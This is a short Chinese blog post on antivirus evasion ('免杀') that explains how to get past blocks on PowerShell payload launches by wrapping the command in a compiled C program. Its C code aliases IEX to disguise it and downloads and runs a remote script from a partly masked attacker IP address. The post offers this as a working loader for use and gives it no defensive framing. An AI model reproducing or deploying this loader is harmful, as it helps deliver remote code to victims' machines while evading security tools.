c+powershell免杀

powershell 的上线方式 现在很多都拦了 可以尝试将powershell语句 写入代码中 用可执行文件来调用powershell 执行命令

1
2
3
4
5
6
7
8
#include<stdio.h>
#include<stdlib.h>
int main()
{

	system("powershell.exe set-alias -name hhh -value IEX;hhh(New-Object Net.WebClient).DownloadString('http://1.116.xxx.xx:80/a') ");
	return 0;
}

然后编译

image-20220313005618323

image-20220313010644322

image-20220313010813690

image-20220313010920748

免杀
免杀

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!